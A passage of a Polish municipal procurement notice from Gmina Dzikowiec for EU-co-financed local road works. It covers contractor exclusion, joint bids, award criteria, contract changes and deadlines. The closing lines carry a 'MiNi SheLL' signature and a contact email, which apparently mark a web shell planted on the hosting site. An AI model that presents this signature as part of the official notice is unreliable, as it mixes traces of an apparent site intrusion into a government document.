c)którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1 Pzp, zawierające błędy lub 
d)	którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. 
5.8. Jeżeli wartość robót budowlanych jest wyrażona w innej walucie niż PLN, należy ją przeliczyć  według kursu NBP na dzień  ogłoszenia o zamówieniu.
5.9. Z postępowania o udzielenie zamówienia wyklucza się wykonawców, którzy należąc do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji       i konsumentów (Dz. U. z Nr 50, poz. 331 z późn. zm.), złożyli odrębne oferty, chyba że wykażą,  że istniejące miedzy nimi powiązania nie prowadzą do zachwiania uczciwej konkurencji pomiędzy wykonawcami w postępowaniu o udzielenie zamówieniu. 
5.10. Wykazując spełnianie powyższego warunku, polegania na zasobach innych podmiotów na  zasadach określonych w art. 26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji       części zamówienia, zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów oświadczenia o braku podstaw do wykluczenia z postępowania z powodu niespełnienia warunków,  o których mowa w art. 24 ust. 1 Pzp.
5.11. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach  (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty. Z treści  złożonych dokumentów musi wynikać jednoznacznie, iż postawione warunki w SIWZ   Wykonawca spełnia nie później niż w dniu, w którym upłynął termin składania ofert. 
 W przypadku nie wykazania przez Wykonawców spełnienia warunków udziału w niniejszym  postępowaniu, zostaną oni wykluczeni z postępowania na podstawie art. 24 ust. 2 pkt 4 ustawy, z zastrzeżeniem art. 26 ust. 3 ustawy.            
5.12. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia.
1)	W przypadku wspólnego ubiegania się o zamówienie będące przedmiotem niniejszego  postępowania przez kilku wykonawców, działających w trybie art. 23 ustawy Prawo zamówień publicznych, warunki udziału formalne, tj. warunek posiadania uprawnienia do występowania w obrocie prawnym i warunek, aby nie być wykluczonym z ubiegania się o udzielenie zamówienia publicznego na podstawie art. 24 ust.1 ustawy Prawo zamówień publicznych muszą być spełnione oddzielnie przez każdego z tych wykonawców, natomiast określone powyżej przez zamawiającego warunki udziału merytoryczne, tj. posiadanie niezbędnej wiedzy i doświadczenia, dysponowanie potencjałem technicznym, zapewniającej wykonanie zamówienia będącego przedmiotem niniejszego postępowania mogą być spełnione łącznie przez wszystkich tych wykonawców.
2)	Wspólnicy muszą ustanowić pełnomocnika do reprezentowania ich 
w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo, podpisane     przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników.
3)	Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte  wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego.
4)	Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem.
5)	Każdy z podmiotów występujących wspólnie ma obowiązek dołączenia do oferty dokumentów wymienionych w pkt 6.3 ppkt 1,2 i w pkt 6.4. Pozostałe dokumenty będą traktowane jako wspólne. 
6)	Wyżej wymienione dokumenty składane są w oryginale lub kopii poświadczonej za  zgodność z oryginałem przez Wykonawcę.
     7)  Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, została          wybrana, przed zawarciem umowy w sprawie zamówienia publicznego pod rygorem          stwierdzenia uchylania się od podpisania umowy należy przedłożyć Zamawiającemu  umowę regulującą współpracę tych wykonawców.
  5.13. Nie podlega poprawie niewłaściwie przyjęta stawka VAT. W przypadku, gdy zamawiający      nie określił w SIWZ konkretnej stawki podatku VAT, przyjęcie   
     w ofercie nieprawidłowej stawki podatku VAT jest równoznaczne z błędem 
     w obliczeniu zawartej w ofercie ceny, polegającym na wadliwym doborze przez wykonawcę      elementu mającego wpływ na obliczenie wysokości zaoferowanej ceny. W takim przypadku      znajduje zastosowanie art. 89 ust. 1 pkt 6 ustawy PZP skutkujący odrzuceniem oferty      zawierającej cenę obliczoną z zastosowaniem nieprawidłowej stawki podatku VAT (błąd      w obliczeniu ceny).
 5.14. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Okres gwarancji i rękojmi - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>16.1.Wzór umowy w sprawie niniejszego zamówienia publicznego zawarty jest w załączniku nr
         8 do SIWZ.
16.2. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty,
         na podstawie której dokonano wyboru Wykonawcy, chyba że Zamawiający przewidział          możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w specyfikacji istot-nych warunków zamówienia oraz określił warunki takiej zmiany.
          Zamawiający, dla zapewnienia prawidłowej realizacji zadania, dopuszcza możliwość zmian postanowień zawartych w niniejszej umowie, w tym w szczególności dotyczy to przedmiotu zamówienia, terminu wykonania umowy, ustalonego wynagrodzenia.
16.3. Zamawiający przewiduje możliwość zmiany treści umowy w zakresie:
         1) wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy,
         2) wystąpienia konieczności zmiany osób (śmierć, choroba, ustanie stosunku pracy lub inne
              zdarzenia losowe, lub inne przyczyny niezależne od Wykonawcy) przy pomocy, których
             Wykonawca realizuje przedmiot umowy,
        3) Zamawiający dopuszcza, w uzasadnionych przypadkach, zmianę postanowień umowy
            w zakresie podwykonawstwa wraz z konsekwencjami z tego wynikającymi, w razie
            wystąpienia poniższych okoliczności:
 a) w przypadku konieczności zmiany zakresu podwykonawstwa w stosunku do wskazane-go
                 w ofercie lub rezygnacji z wykonywania przedmiotu umowy w podwykonawstwie,
 b) w przypadku zmiany lub rezygnacji z podwykonawcy, przy pomocy którego wykonawca
                 zamierzał wykonać przedmiot umowy.
 c) w sytuacji, gdy wykonawca zamierzał wykonać przedmiot umowy samodzielnie, jednak
                 że z uwagi na wystąpienie okoliczności niemożliwych do przewidzenia w dniu składa-nia
                 ofert, zachodzi konieczność powierzenia wykonania części zamówienia podwykonawcy.
   Dokonując powyższych zmian wykonawca zadba o odpowiednie stosowanie regulacji
                 umowy w zakresie podwykonawstwa oraz o zabezpieczenie ewentualnych roszczeń za
                 dotychczas wykonane zakresy robót lub usług,
         4) zmiany podwykonawcy, który zgodnie z art. 26 ust. 2b ustawy Prawo zamówień 
             publicznych będzie podmiotem udostępniającym zasoby niezbędne do realizacji  
             zamówienia. W takim przypadku Wykonawca jest zobowiązany zaproponować innego
             podwykonawcę,
         5) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy,
         6) zmiany umowy dotyczące warunków płatności,
         7) wprowadzenia zmian w stosunku do opisu przedmiotu zamówienia w zakresie wykonania
             prac nie wykraczających poza zakres przedmiotu zamówienia, w sytuacji konieczności
             zwiększenia usprawnienia procesu realizacji zamówienia,
 16.4. Zmiana postanowień Umowy w stosunku do treści oferty Wykonawcy w zakresie  wynagro-dzenia dopuszczalna jest w przypadku:
     a) odstąpienia na wniosek Zamawiającego od realizacji części zamówienia i związanej, z tym zmiany wynagrodzenia, pod warunkiem wystąpienia obiektywnych okoliczności, których Zamawiający nie mógł przewidzieć na etapie przygotowania postępowania, a które powodu-ją, że wykonanie przedmiotu zamówienia bez ograniczenia zakresu zamówienia, powodowa-łoby dla Zamawiającego niekorzystne skutki z uwagi na zamierzony cel realizacji przedmio-tu zamówienia i związane z tym racjonalne wydatkowanie środków publicznych,
     b) ustawowa zmiana stawki podatku VAT,
     c)  dla prawidłowej realizacji przedmiotu zamówienia zgodnie z zasadami współczesnej wiedzy 
          technicznej i obowiązujących przepisów niezbędne jest użycie rozwiązań zamiennych, innych
          materiałów, parametrów, innego rodzaju robót niż te wskazane w ofercie wykonawcy lub 
          SIWZ ,
d) wystąpi konieczność wykonania zamówień dodatkowych nie objętych zamówieniem   podstawowych, niezbędnych do prawidłowego wykonania przedmiotu zamówienia których realizacja spowoduje zmianę w zakresie rzeczowym zamówienia podstawowego
     e) wystąpi konieczność wykonania robót dodatkowych w sytuacji gdy wykonanie tych robót 
         będzie niezbędne do prawidłowego wykonania przedmiotu umowy, 
     f) wykonania robót dodatkowych lub zamiennych, które będą niezbędne do prawidłowego
         wykonania i zakończenia robót objętych umową podstawową.        

16.5. Zamawiający ponadto dopuszcza możliwość zmiany terminu wykonania umowy w sytuacji, 
         gdy:
    a) wystąpią niekorzystne warunki pogodowe,
    b) wystąpią przeszkody natury prawnej lub technicznej, 
16.6. Wystąpienia siły wyższej na poniższych warunkach:
        1) terminy realizacji przedmiotu zamówienia oraz harmonogramu mogą ulec przesunięciu            o czas wynikły wskutek siły wyższej, warunków atmosferycznych uniemożliwiających rozpoczęcie bądź kontynuowanie usługi, lub przerw w realizacji, powstałych z przyczyn zależnych od Zamawiającego,
       2) przez siłę wyższą Strony rozumieją zdarzenie nagłe, nieprzewidywalne i niezależne od           woli Stron, uniemożliwiające wykonanie Umowy na stałe lub na pewien czas, któremu nie  można zapobiec, ani przeciwdziałać przy zachowaniu należytej staranności,
16.7. Zmian obligatoryjnych wynikających ze zmian przepisów prawa, niezależnych od stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.dzikowiec.itl.pl/bip/index.php?page=galeria.php&id=2598&grp=10<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> rząd Gminy Dzikowiec
ul. Dworska 62
36-122 Dzikowiec
pok. nr 30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.07.2016 godzina 10:00, miejsce: Urząd Gminy Dzikowiec
ul. Dworska 62
36-122 Dzikowiec
pok. nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadania współfinansowane są ze środków UE w ramach Programu Rozwoju 
 Obszarów Wiejskich na lata 2014-2020,  operacja typu: Budowa lub modernizacja dróg  lokalnych, w ramach poddziałania Wsparcie inwestycji związanych z tworzeniem,        ulepszaniem lub rozbudową wszystkich rodzajów małej infrastruktury, w tym inwestycji        w energię odnawialną i w oszczędzanie energii, działanie Podstawowe usługi i odnowa wsi na       obszarach wiejskich..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com